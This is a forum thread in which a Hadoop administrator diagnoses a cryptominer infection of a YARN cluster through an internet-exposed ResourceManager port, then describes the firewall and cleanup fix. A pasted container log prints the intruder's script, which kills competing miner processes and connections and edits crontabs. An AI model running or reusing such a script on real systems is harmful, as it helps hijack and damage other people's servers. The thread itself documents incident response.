Help please: Continuous YARN jobs failing with Exception message: bash: no job control in this shell

Contributor

Hi everyone,

 

I'm fairly familiar with Cloudera Hadoop, but this one is stumping me. I installed a fresh copy of CM 5.15.0 on newly provisioned hardware today:

 

Version: Cloudera Express 5.15.0
Java VM Name: Java HotSpot(TM) 64-Bit Server VM
Java VM Vendor: Oracle Corporation
Java Version: 1.7.0_67

 

It's running CDH5 version: 5.15.0-1.cdh5.15.0.p0.21

 

When I spun up the cluster, I noticed that the Cluster CPU was pegged at 100%.  Odd, since nothing should be running here yet.  A quick look at "top" on the datanodes showed yarn processes on each taking tons of CPU:

 

top - 20:57:28 up 3:20, 1 user, load average: 39.26, 39.38, 38.46
Tasks: 408 total, 1 running, 407 sleeping, 0 stopped, 0 zombie
Cpu(s): 28.6%us, 0.2%sy, 0.0%ni, 71.2%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 30794896k total, 4898532k used, 25896364k free, 123248k buffers
Swap: 0k total, 0k used, 0k free, 2963828k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
26355 yarn 20 0 391m 27m 584 S 549.0 0.1 303:19.37 java
26273 yarn 20 0 391m 27m 588 S 515.6 0.1 303:23.67 java
26313 yarn 20 0 391m 27m 584 S 512.9 0.1 303:33.08 java

 

These are 16-core servers, so a load average of 39.26 is crazy high.  I then checked the YARN -> Applications tab in CM, and roughly 40 jobs a minute are being spawned and failing with this info:

 

ID: application_1534449578775_0528

Type: YARN

User: dr.who

Pool: root.users.dr_dot_who

Duration: 25.9s

Allocated Memory Seconds: 10.5K

Allocated VCore Seconds: 10
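
(Side note for anyone following along: these applications can also be listed and killed from the command line; a rough sketch, assuming the yarn CLI is available on a cluster host:)

# all of the rogue applications show up under user dr.who
yarn application -list -appStates ACCEPTED,RUNNING

# individual ones can be killed by ID, although new ones keep arriving
yarn application -kill application_1534449578775_0528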

 

Every one of them has this error under "Application Details":

 

=================================================================

Application application_1534449578775_0528 failed 2 times due to AM Container for appattempt_1534449578775_0528_000002 exited with exitCode: 123
For more detailed output, check application tracking page:http://bddevh01.dbhotelcloud.com:8088/proxy/application_1534449578775_0528/Then, click on links to logs of each attempt.
Diagnostics: Exception from container-launch.
Container id: container_1534449578775_0528_02_000001
Exit code: 123
Exception message: bash: no job control in this shell
bash-4.1$ for i in {1..60}; do ps ax|grep ff.sh|awk '{print $1}'|xargs ps -o ppid=|xargs kill -9; done;
pgrep -f "sh \./a[[:digit:]]{1,}$"|xargs kill -9;
ps ax|grep "./no1\|sssshd\|terty\|asdfsd\|qwefdas\|piois"|grep -v grep | awk '{print $1}' | xargs kill -9;
ps ax|grep "./uiiu"|grep -v grep | awk '{print $1}' | xargs kill -9;
ps ax|grep "./noda\|./manager"|grep sh|grep -v grep | awk '{print $1}' | xargs kill -9;
ps ax|grep "./noss"|grep -v grep | awk '{print $1}' | xargs kill -9;
crontab -l | sed '/tmp/d' | crontab -;
crontab -l | sed '/jpg/d' | crontab -;
crontab -l | sed '/png/d' | crontab -;
netstat -antp | grep '158.69.133.20\|192.99.142.249\|202.144.193.110\|192.99.142.225\|192.99.142.246\|46.4.200.177\|192.99.142.250\|46.4.200.179\|192.99.142.251\|46.4.200.178\|159.65.202.177\|185.92.223.190\|222.187.232.9' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
usage: kill [ -s signal | -p ] [ -a ] pid ...

<snip>

kill -l [ signal ]
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
usage: kill [ -s signal | -p ] [ -a ] pid ...
kill -l [ signal ]
bash-4.1$ exit
at org.apache.hadoop.util.Shell.runCommand(Shell.java:604)
at org.apache.hadoop.util.Shell.run(Shell.java:507)
at org.apache.hadoop.util.Shell$ShellCommandExecutor.execute(Shell.java:789)
at org.apache.hadoop.yarn.server.nodemanager.DefaultContainerExecutor.launchContainer(DefaultContainerExecutor.java:213)
at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:302)
at org.apache.hadoop.yarn.server.nodemanager.containermanager.launcher.ContainerLaunch.call(ContainerLaunch.java:82)
at java.util.concurrent.FutureTask.run(FutureTask.java:262)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
at java.lang.Thread.run(Thread.java:745)
Container exited with a non-zero exit code 123
Failing this attempt. Failing the application.

=================================================================

 

Does anyone know what this job is, or why it is getting this exception:

 

Exception message: bash: no job control in this shell

 

I've googled that error, but the results haven't pointed me toward the root cause.

 

Thank you SO MUCH for your time and suggestions...

Chris

 


4 REPLIES

Contributor

Sorry, I should have also mentioned that I did verify that port 2049 is not blocked at the firewall, using the Unix "nc" command.
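
(In case it helps, this is the sort of check I mean; the hostname is just the one from the logs above, and exact flags vary a little between nc variants:)

# from a host outside the cluster: -z scans without sending data, -v reports the result
nc -zv bddevh01.dbhotelcloud.com 2049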

 

Also, interestingly enough, even after stopping the YARN service in CM, the jobs kept spawning.  I inspected the process that's running, and it's an odd one (to me):

 

yarn 28333 1 99 19:59 ? 09:47:22 /var/tmp/java -c /var/tmp/w.conf

 

I don't know why there is a "java" binary in /var/tmp, and there was no "w.conf" file there either.
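
If anyone wants to poke at a process like this themselves, the /proc entries are a reasonable place to start (a sketch; 28333 is just the PID from the ps output above):

# shows which binary the process was started from, even if it has since been deleted
ls -l /proc/28333/exe /proc/28333/cwd

# full command line; /proc stores it NUL-separated, so translate to spaces
tr '\0' ' ' < /proc/28333/cmdline; echo

# open files and network sockets, if lsof is installed
lsof -p 28333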

 

The mystery continues...

Contributor

More info:

 

I found this:  https://community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-a...

 

which is exactly what is happening to me.  Apparently my Security Groups in AWS need to be tightened somehow?  I'm not sure how this is happening...yet.
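
One quick way to test that theory (a sketch; run it from somewhere outside the VPC, hostname is the one from the logs above): if the ResourceManager web port answers, anyone on the internet can reach the REST API and submit applications as dr.who.

# if this returns JSON cluster info from outside your network, port 8088 is wide open
curl http://bddevh01.dbhotelcloud.com:8088/ws/v1/cluster/info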

 

 

Contributor

Yup.  Looks like this is the culprit:

 

https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html

 

I found an entry in the security group that needed updating.  I'm thinking this will fix the problem.  Will post back one more time with a confirmation.
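
(For anyone else in the same spot, the fix looks roughly like this with the AWS CLI; the group ID below is made up, and the assumption is that the bad rule opened 8088 to 0.0.0.0/0:)

# remove the world-open rule for the ResourceManager web port
aws ec2 revoke-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 8088 --cidr 0.0.0.0/0

# re-add it scoped to a trusted range only (example CIDR, substitute your own)
aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 8088 --cidr 203.0.113.0/24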

 

Contributor

Confirmed.  This was the issue.  Blocking outside traffic to port 8088 at the firewall kept this from happening again, along with removing the rogue cron entry from the yarn user's crontab and killing those yarn processes.
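
The node cleanup was along these lines (a sketch, not the exact commands I ran; run as root on each affected host and adjust for what you actually find):

# inspect the yarn user's crontab and delete the rogue entry by hand
crontab -u yarn -l
crontab -u yarn -e

# kill the miner processes and remove the files they dropped
pkill -9 -u yarn -f '/var/tmp/java'
rm -f /var/tmp/java /var/tmp/w.conf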

 

Chris